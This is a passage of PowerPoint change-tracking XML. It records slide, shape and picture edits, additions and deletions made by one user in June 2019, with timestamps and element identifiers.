        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:23:28.536" v="1158" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4024087431" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:21:13.566" v="1116" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4024087431" sldId="266"/>
            <ac:spMk id="2" creationId="{5AEC664A-4693-4705-8F6B-635F5A045BF6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:22:00.738" v="1119"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4024087431" sldId="266"/>
            <ac:spMk id="3" creationId="{8D2CCD80-0A50-4603-AD92-EFF9CC48219A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:23:28.536" v="1158" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4024087431" sldId="266"/>
            <ac:spMk id="4" creationId="{D3E13A53-D891-4A54-8903-F8E8B2FE28AB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:19:31.644" v="1083"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="458480970" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:19:14.940" v="1080" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="2" creationId="{1DC159E3-3631-49B8-9B11-070A004CD8BC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:19:31.644" v="1083"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="3" creationId="{F76379D1-F272-450D-BE19-A1071A870A6D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:20:05.144" v="1099" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="917986403" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:20:05.144" v="1099" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="2" creationId="{0D8FB6DB-E2C3-44E9-BC28-FB08080DA7EF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:23:39.954" v="22" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:23:39.954" v="22" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2809929173" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:23:20.673" v="16" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="3" creationId="{E9514551-CD8A-40A6-A998-E7618E31C4FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:23:20.720" v="17" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="4" creationId="{13474DE2-D7F6-455A-B8DF-0A80C79F7CBA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:23:20.736" v="18" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="6" creationId="{F8B6CE1F-C11B-434D-B9B2-56DE5E15CD25}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:23:20.798" v="20" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="7" creationId="{AF861752-776B-41F8-AB6A-11982047C04F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:23:39.954" v="22" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="8" creationId="{594532C4-922D-484C-8561-C44201948888}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:23:31.236" v="21" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="10" creationId="{D86248CE-9B72-4003-B5B5-8EC68C4FB040}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:23:20.767" v="19" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="12" creationId="{CD99AA2C-236A-4B98-861F-8DDC522B388B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:20:43.500" v="6" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1408271386" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:20:38.828" v="2" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="5" creationId="{F3F015C1-4E03-433D-BF3E-B033B779896E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{B58B9885-E2F5-DE5F-1EB0-786C81BAB0FA}" dt="2019-06-06T20:20:43.500" v="6" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="7" creationId="{13DDC5EC-89F9-4E45-86F7-A163FDF29919}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}"/>
    <pc:docChg chg="addSld delSld modSld sldOrd">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:43:45.709" v="2232" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:42:43.754" v="2196" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1926449966" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:42:43.754" v="2196" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="4" creationId="{2DDEECF7-AF9E-4EF3-91A3-689445B25498}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T08:42:33.036" v="2193" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="7" creationId="{64BB1751-D3DC-4471-B6B0-BE6ADE79F9AF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:58:19.203" v="802" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2886590775" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:58:19.203" v="802" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="2" creationId="{6E15723C-2368-4809-A835-2A53B4CC56DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:48:20.956" v="605" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="4" creationId="{8AE5C81D-0FFB-4CBD-BF89-8872B36B94EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:48:20.971" v="606" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="6" creationId="{53E9DF78-EFAC-4F59-8611-0FEDADADCA6A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:48:20.987" v="607" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="7" creationId="{0F04E23D-A26E-4029-B989-CC81B51B3DB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:48:30.987" v="608" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="8" creationId="{5B1A0ACD-7B0B-4F6B-AED4-F2F5B2C68BAC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:51:10.130" v="621" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="9" creationId="{D718A3D6-FC8B-4691-A3BA-54C25E2D20F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:53:25.592" v="696" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="10" creationId="{966440A0-F4F2-4001-9BE7-5D9C213C4A63}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:51:04.443" v="620" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="11" creationId="{27CA9ED9-F5A6-426C-8EEB-3307AB12BA3E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:52:15.061" v="625"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="15" creationId="{D96DA130-F79F-4B78-A80E-33354F80026C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:50:48.722" v="619" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="17" creationId="{793B68FA-E995-47B3-BD6A-DC7873490C85}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:52:00.451" v="624" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="18" creationId="{DA260270-63F7-4E17-8ECA-5CCA0C71D60E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:50:23.925" v="616"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="19" creationId="{502C1CA0-AFE8-4F16-94A3-1C261836FBA6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:50:43.472" v="618" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="20" creationId="{10597FE3-444B-40C3-9406-F8EB4003A9AA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:49:20.581" v="1540" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2809929173" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:58:43.814" v="814" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="2" creationId="{CD06FDCD-F202-44B7-8AAA-17D531BA5E15}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:49:20.581" v="1540" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="7" creationId="{AF861752-776B-41F8-AB6A-11982047C04F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:48:46.737" v="1535" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="11" creationId="{F666636D-1AB3-4733-868A-8486432CA646}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:47:17.675" v="1446"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="8" creationId="{594532C4-922D-484C-8561-C44201948888}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:47:40.675" v="1450" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="10" creationId="{D86248CE-9B72-4003-B5B5-8EC68C4FB040}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:15:08.740" v="873" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3389707094" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T05:58:26.672" v="807" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="2" creationId="{496DE6F0-0365-4996-86ED-FFF7DE98959E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:13:33.209" v="828" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="4" creationId="{C1072647-6C18-4C9E-8B4B-F8295ED393E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:15:08.740" v="873" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="7" creationId="{FA6725A5-C911-4F9A-A257-EBE8D966E696}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:15:03.084" v="872" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:picMk id="5" creationId="{2484F8EB-E7CB-4EDD-B112-360B4ECCAD9B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:42:06.346" v="1363" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1727781075" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:39:24.908" v="1349" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="2" creationId="{11B2CB23-0A51-4BE0-B46E-1691D22EDCA5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:40:36.345" v="1360"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="3" creationId="{2E57E17D-B5F0-46C7-9504-7C20ABA2E4F1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:40:31.299" v="1359"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="9" creationId="{6E0C3F27-73B3-48AE-BBCD-70A51E0AB1A5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{5C466ED6-B64F-C487-9B3F-0EA99E81EA3D}" dt="2019-06-08T06:40:43.283" v="1361" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="11" creationId="{42BD6D26-2AA5-4CE4-9A7A-25907E0F7AF8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
